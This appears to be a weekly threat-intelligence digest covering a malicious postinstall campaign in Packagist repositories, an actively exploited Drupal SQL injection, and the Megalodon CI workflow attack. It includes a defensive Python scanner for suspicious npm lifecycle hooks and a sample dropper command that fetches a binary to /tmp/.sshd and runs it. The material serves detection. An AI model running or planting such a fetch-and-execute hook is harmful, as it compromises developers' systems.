Weekly review

ThreatNoir Weekend Brief — May 23

2026-05-23, Morning, 4 articles

Morning Review in IT Security — May 23, 2026

The security landscape on May 23, 2026, presents a critical convergence of supply chain threats and active exploitation campaigns. Researchers have identified coordinated attacks spanning multiple ecosystems, from PHP package repositories to GitHub workflows, while active exploitation of newly disclosed vulnerabilities continues to accelerate.

Malicious Postinstall Hook Detected Across 700+ GitHub Repositories

Socket researchers have uncovered a coordinated supply chain campaign affecting eight Composer packages whose upstream repositories were modified to include identical malicious postinstall scripts. The attack demonstrates a sophisticated cross-ecosystem targeting strategy, as the malicious code was inserted into package.json rather than composer.json, potentially evading detection by developers and security teams focused solely on PHP dependency metadata. This placement is particularly dangerous because developers reviewing Composer packages may overlook JavaScript lifecycle hooks bundled within the same repository.

The malicious postinstall script downloads a Linux binary named gvfsd-network from an attacker-controlled GitHub Releases URL, writes it to /tmp/.sshd, makes it executable, and runs it in the background. The command disables TLS certificate verification using curl -k, suppresses error output, and disguises the executable under a system-like filename. The affected packages include moritz-sauer-13/silverstripe-cms-theme, crosiersource/crosierlib-base, devdojo/wave, devdojo/genesis, katanaui/katana, elitedevsquad/sidecar-laravel, r2luna/brain, and baskarcm/tzi-chat-ui. GitHub code searches revealed hundreds of additional references tied to the same attacker infrastructure, suggesting the campaign extends far beyond the confirmed Packagist findings.

The most significant exposure exists in starter kit projects, particularly devdojo/wave with approximately 6,400 GitHub stars and 9,100 Packagist installs. When developers clone these repositories, the malicious package.json lands at the project root, where npm install executes the postinstall script directly. Socket has recommended that teams using Packagist packages containing JavaScript build tooling inspect bundled package.json files alongside composer.json, with heightened vigilance for branch-tracking dependencies where package contents can change as upstream branches evolve. Source: Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects
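A defender-side check for the hook pattern described above, written for this brief and not taken from Socket's tooling: it parses the lifecycle scripts in every package.json under a checkout (Composer vendor trees included) and flags the traits the researchers reported, such as curl -k, a dotfile dropped under /tmp, chmod, and backgrounded execution. The sample package.json is constructed, with a placeholder download URL.

```python
import json
import os
import re

LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}  # run by `npm install`

# Traits of the reported dropper, as (label, regex) pairs.
SUSPICIOUS_PATTERNS = [
    ("insecure_tls", re.compile(r"\bcurl\b[^|;&]*(\s-[A-Za-z]*k\b|--insecure)")),
    ("github_release_fetch", re.compile(r"github\.com/[^\s\"']+/releases/download/")),
    ("hidden_tmp_path", re.compile(r"/tmp/\.[A-Za-z0-9_.-]+")),
    ("chmod_exec", re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")),
    ("background_exec", re.compile(r"&\s*$|\bnohup\b|\bsetsid\b")),
    ("stderr_suppressed", re.compile(r"2>\s*/dev/null")),
]

def score_script(cmd):
    """Return the labels of every trait matched by one hook command."""
    return [label for label, rx in SUSPICIOUS_PATTERNS if rx.search(cmd)]

def inspect_package_json(text, path="package.json"):
    """Report lifecycle hooks in one package.json body that match any trait."""
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return [{"path": path, "hook": None, "command": None, "indicators": ["unparseable"]}]
    findings = []
    for hook, cmd in (data.get("scripts") or {}).items():
        hits = score_script(cmd) if hook in LIFECYCLE_HOOKS and isinstance(cmd, str) else []
        if hits:
            findings.append({"path": path, "hook": hook, "command": cmd, "indicators": hits})
    return findings

def scan_tree(root):
    """Inspect every package.json under a checkout: composer.json never lists bundled npm hooks."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != "node_modules"]  # skip installed deps
        if "package.json" in filenames:
            p = os.path.join(dirpath, "package.json")
            with open(p, encoding="utf-8", errors="replace") as fh:
                findings.extend(inspect_package_json(fh.read(), p))
    return findings

# Constructed sample modelled on the reported hook; the download URL is a placeholder.
SAMPLE = json.dumps({"name": "demo-theme", "scripts": {
    "build": "vite build",
    "postinstall": "curl -sk -o /tmp/.sshd https://github.com/EXAMPLE-ORG/EXAMPLE-REPO"
                   "/releases/download/v1/gvfsd-network 2>/dev/null; chmod +x /tmp/.sshd; /tmp/.sshd &",
}})
```

Run `scan_tree(".")` from a project root or a Composer vendor/ directory; any finding with two or more indicators deserves a manual look at the hook before the next `npm install`.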

Drupal Core SQL Injection Vulnerability Added to CISA KEV Catalog

The Cybersecurity and Infrastructure Security Agency has added Drupal core SQL injection vulnerability CVE-2026-9082 to its Known Exploited Vulnerabilities catalog, signaling official recognition of the threat. This addition to the KEV catalog typically indicates that the vulnerability has been observed in active exploitation attempts and warrants immediate prioritization by defenders. Source: RT @CISACyber: 🛡️ We added Drupal core SQL injection vulnerability CVE-2026-9082 to our KEV Cata...

Drupal SQL Injection Flaw Now Under Active Attack

Security researchers have confirmed that threat actors are actively exploiting the Drupal SQL injection vulnerability, CVE-2026-9082, which has been classified as highly critical. The rapid transition from disclosure to active exploitation underscores the urgency of patching, as attackers have already begun leveraging this flaw in real-world attacks. Organizations running Drupal installations should prioritize immediate remediation to prevent unauthorized database access and potential data exfiltration. Source: Drupal: Critical SQL injection flaw now targeted in attacks

Megalodon Supply Chain Attack Compromises 5,561 GitHub Repositories in Six Hours

SafeDep researchers have documented a large-scale supply chain attack designated Megalodon that targeted 5,561 GitHub repositories with malicious CI workflows and cloud credential theft mechanisms within a six-hour window. The attack demonstrates the velocity and scale at which modern supply chain threats can propagate, leveraging GitHub's CI/CD infrastructure to distribute malicious payloads. The attack involved malicious artifacts tracked as Optimize-Build and SysDiag, which attempted to harvest cloud credentials and establish persistence within compromised development environments. This incident underscores the critical need for organizations to implement strict controls over CI/CD pipeline configurations and monitor for unauthorized workflow modifications. Source: 5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours

The convergence of these threats—from cross-ecosystem package poisoning to active zero-day exploitation and massive CI/CD compromises—reflects an increasingly sophisticated threat landscape targeting the software supply chain. Organizations must implement layered defenses including dependency scanning, workflow auditing, and rapid patching protocols to mitigate these interconnected risks.

Sources & IOCs

Source articles and extracted indicators (defanged where appropriate).